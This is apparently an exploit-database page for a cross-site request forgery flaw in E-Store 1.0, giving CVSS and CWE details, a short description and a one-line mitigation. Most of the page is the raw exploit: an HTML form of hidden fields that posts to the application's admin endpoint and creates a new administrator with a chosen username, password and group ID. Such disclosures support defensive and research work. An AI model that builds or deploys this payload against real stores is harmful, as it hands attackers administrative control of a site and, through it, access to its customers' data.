header-logo
Suggest Exploit
vendor:
E-Store 1.0
by:
AtT4CKxT3rR0r1ST
5.5
CVSS
MEDIUM
XSRF
352
CWE
Product Name: E-Store 1.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

E-Store 1.0 XSRF Vulnerability (Add Admin)

This exploit allows an attacker to add an admin user to the E-Store 1.0 application by sending a crafted HTTP request. The attacker can specify the username, password, email, and group ID for the new admin user.

Mitigation:

To mitigate this vulnerability, it is recommended to implement CSRF tokens in the application to validate the authenticity of requests.
Source

Exploit-DB raw data:

E-Store 1.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/store_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/E-Store/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################